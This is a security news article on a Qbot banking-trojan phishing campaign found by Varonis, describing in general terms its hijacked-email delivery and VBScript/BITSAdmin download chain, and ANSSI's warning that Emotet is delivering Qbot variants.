Qbot, an information stealing Trojan that has been around for 10 years, has resurfaced again with a new phishing-based infection technique that is capable of bypassing anti-spam defenses. Varonis Security Research discovered the new Qbot campaign in March. Investigators have positively identified 2,726 victims, based on an analysis of one of the attacker’s servers. However, they suspect that the actual number of victims is much higher.
Qbot, also known as QakBot, is known for its polymorphic behavior and its worm-like tendencies, such as the ability to self-replicate via shared drives and removable media. On this occasion, QBot has spread through a phishing campaign targeting US corporations and also victims in Europe, Asia and South America.
The delivery mechanism for this variant of Qbot is through phishing campaigns, where victims receive an email containing a link to what appears to be an online document. The email is intended to be an existing email thread, under the guise of responding to a pre-existing business correspondence, thus avoiding spam filters. The target of the attacks is to steal financial information, including bank account credentials.
The infection technique is typical. A phishing email arrives with a link to a Microsoft OneDrive file that delivers an edition of Microsoft Visual Basic Scripts (VBScript) in a compressed ZIP file. If the file is opened, the attack spawns the legitimate Windows BITSAdmin utility. This activates another native Windows utility, Wscript.exe, which is used to download the Qbot malware file “august.png” from the attacker’s server.
And it is that the French national cybersecurity agency has issued a notice about an increase in attacks in which Emotet is being used, targeting both the private sector and public entities. “For several days, ANSSI has observed that Emotet malware targets French companies and administrations,” the alert issued by ANSSI indicates, Special attention should be paid because Emotet is now used to implement other malicious code that can have a strong impact in the activity of the victims.
And why did we mention Emotet in this article based on Qbot? Well, because in the attacks detected by the French authorities, Emotet has been used to deliver various variants of this family of Qbot.
